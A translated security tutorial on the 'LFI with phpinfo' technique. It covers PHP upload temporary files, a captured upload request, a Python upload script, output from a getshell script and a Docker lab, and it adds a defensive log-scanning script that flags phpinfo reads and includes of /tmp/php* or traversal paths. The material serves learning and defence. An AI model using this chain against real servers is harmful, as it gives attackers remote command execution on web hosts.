PHP local file inclusion vulnerability: building and using a test environment

0x00 Introduction
The background on PHP local file inclusion (LFI) vulnerabilities was covered in an earlier article on Wooyun. "LFI with phpinfo" was first proposed by Daniel abroad; the two papers linked below are the original references. The principle of the exploit is that a PHP POST upload causes the server to create a temporary file; phpinfo() reveals the path and name of that temporary file, and a local file inclusion vulnerability is then used to include it and generate a backdoor.
This method was tested successfully locally. To make it easier to learn and to reduce the setup cost, I built a Docker environment for testing. With the built Docker image placed on a foreign VPS and the script from the poc folder of the github project lfi_phpinfo run locally, getshell still works, so the method is feasible and does not place high demands on the network.
The source code is stored in the code directory and can be reproduced with Docker; the poc directory holds the scripts.
Paper:
http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf
http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf
0x01 PHP upload
Uploading an arbitrary file to the server with a POST request causes a temporary file to be generated; the path and name of that temporary file can be found on the phpinfo page.
Whenever a file is uploaded to PHP via POST, the server creates a temporary file to hold the file content.
To make file transfer convenient, the HTTP protocol defines a form-based file transfer method.
For the upload form to work, its attribute must be enctype="multipart/form-data" and the method must be POST; see the PHP manual: features.file-upload.post-method.
The PHP engine processes a request with enctype="multipart/form-data" as follows:
- Request arrival
- Create a temporary file and write the content of the uploaded file
- Call the corresponding PHP script for processing, such as validating the name and size
- Delete temporary files
The PHP engine first saves the file content to a temporary file and then performs the corresponding operations. The temporary file name is "php" followed by random characters.
- $_FILES holds the information, including the temporary file path and name
In PHP, the superglobal $_FILES stores the information about the uploaded file, including the file name, type, temporary file name, error code and size.
0x02 Manually testing phpinfo() to obtain the temporary file path
File upload.html
[upload.html source: HTML code block not recovered on this page]
Access upload.html in the browser and upload the file file.txt.
[phpinfo.php source: PHP code block not recovered on this page]
The following is the POST request as captured in Burp:
```http
POST /LFI_phpinfo/phpinfo.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/LFI_phpinfo/upload.html
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------11008921013555437861019615112
Content-Length: 368

-----------------------------11008921013555437861019615112
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: text/plain

-----------------------------11008921013555437861019615112
Content-Disposition: form-data; name="submit"

Submit
-----------------------------11008921013555437861019615112--
```
When accessed from the browser, phpinfo returns the following information:
```php
_REQUEST["submit"] Submit
_POST["submit"] Submit
_FILES["file"] Array ( [name] => file.txt [type] => text/plain [tmp_name] => /tmp/phpufdCHh [error] => 0 [size] => 33 )
```
This gives the tmp_name path.
0x03 Uploading a file with a Python script
```python
import requests

host = '127.0.0.1'
url = 'http://{ip}/LFI_phpinfo/phpinfo.php'.format(ip=host)
file_ = '/var/www/LFI_phpinfo/file.txt'

# any multipart upload makes PHP create the temporary file; phpinfo() then prints $_FILES
with open(file_, 'rb') as fh:
    response = requests.post(url, files={"name": fh})
print(response.text)
```
0x04 Local build environment
Get shell
```bash
$ python lfi_phpinfo.py 127.0.0.1
LFI with phpinfo()
==============================
INFO:__main__:Getting initial offset ...
INFO:__main__:found [tmp_name] at 67801
INFO:__main__:Got it! Shell created in /tmp/g
INFO:__main__:Wowo! \m/
INFO:__main__:Shutting down...
```
Access from Firefox:
```bash
http://127.0.0.1/LFI_phpinfo/lfi.php?load=/tmp/gc&f=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
This shows that getshell succeeded and the shell can be used freely from here on ~~
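From the defender's side, the chain shown above leaves a recognisable trace in web server access logs: a client reads the phpinfo page and then passes a /tmp/phpXXXXXX path (or another absolute or traversing path) to the include parameter. The following Python is an added example, not part of the original post or of the lfi_phpinfo project; the log lines are constructed and the set of include-parameter names (load, file, page, include) is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines (not taken from a real server)
SAMPLE_LOG = """\
127.0.0.1 - - [01/Mar/2016:10:00:01 +0000] "GET /LFI_phpinfo/lfi.php?load=about.php HTTP/1.1" 200 512
10.0.0.5 - - [01/Mar/2016:10:00:02 +0000] "POST /LFI_phpinfo/phpinfo.php HTTP/1.1" 200 70211
10.0.0.5 - - [01/Mar/2016:10:00:02 +0000] "GET /LFI_phpinfo/lfi.php?load=/tmp/phpufdCHh HTTP/1.1" 200 33
10.0.0.5 - - [01/Mar/2016:10:00:03 +0000] "GET /LFI_phpinfo/lfi.php?load=/tmp/g&f=id HTTP/1.1" 200 80
10.0.0.9 - - [01/Mar/2016:10:00:04 +0000] "GET /LFI_phpinfo/lfi.php?load=../../etc/passwd HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

INCLUDE_PARAMS = {"load", "file", "page", "include"}      # assumed parameter names used for includes
TMP_UPLOAD_RE = re.compile(r'^/tmp/php[A-Za-z0-9]{6}$')   # PHP upload temp file: "php" + 6 random chars

def classify_target(target):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    if parts.path.endswith("phpinfo.php"):
        return "phpinfo-access"
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in INCLUDE_PARAMS:
            continue
        for value in values:
            if TMP_UPLOAD_RE.match(value):
                return "include-of-upload-tmpfile"
            if value.startswith("/") or ".." in value:
                return "include-absolute-or-traversal"
    return None

def scan_log(text):
    """Classify each request and report clients that both read phpinfo and included a path."""
    findings = []
    by_ip = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_target(m["target"])
        if label:
            findings.append((m["ip"], label, m["target"]))
            by_ip.setdefault(m["ip"], set()).add(label)
    # the phpinfo-assisted LFI chain needs both steps from the same client
    chained = sorted(ip for ip, labels in by_ip.items()
                     if "phpinfo-access" in labels and any(l.startswith("include-") for l in labels))
    return findings, chained

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG)[0]:
        print(*finding)
```

The single-request labels catch ordinary LFI probing; the chained list is the stronger signal, because a legitimate client has no reason to read phpinfo and then include a path in PHP's upload temp directory.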
0x05 Using Docker to build the environment
The basic usage of Docker is not described here; you can google it on your own. Two image sources are provided for building the environment: build it yourself with the Dockerfile in github lfi_phpinfo, or use the image janes/lfi_phpinfo that I have already built.
- php:5.6-apache (official PHP image, used by the Dockerfile)
Or
- janes/lfi_phpinfo
Build the environment and run the test
Obtain the source code of github lfi_phpinfo, switch to the web directory, and start building the environment for testing. Three ways to run it are provided here.
Method 1: run the test using the official PHP image
```bash
# a bind mount needs an absolute host path, so expand the code directory with $(pwd)
docker run --rm -v "$(pwd)/code":/var/www/html -p 80:80 php:5.6-apache
```
Method 2: run the test using the pre-built image janes/lfi_phpinfo
```bash
docker pull "janes/lfi_phpinfo"
docker run --rm -p "80:80" janes/lfi_phpinfo
```
Method 3: use docker-compose
```bash
docker-compose up
```
Next, run the Python script to getshell:
```bash
python lfi_phpinfo.py docker_host_ip
```
0x06 Conclusion
Actually using LFI with phpinfo is not as smooth as reading the article. Along the way you may run into environment-related problems that take effort to solve, and that is what gave me the idea of using Docker to build a test environment, in the hope of offering a more convenient learning setup for those who love network security. Finally, I would like to thank the author of the article [LFI with PHPInfo local test process] for the help it gave me in studying LFI with phpinfo.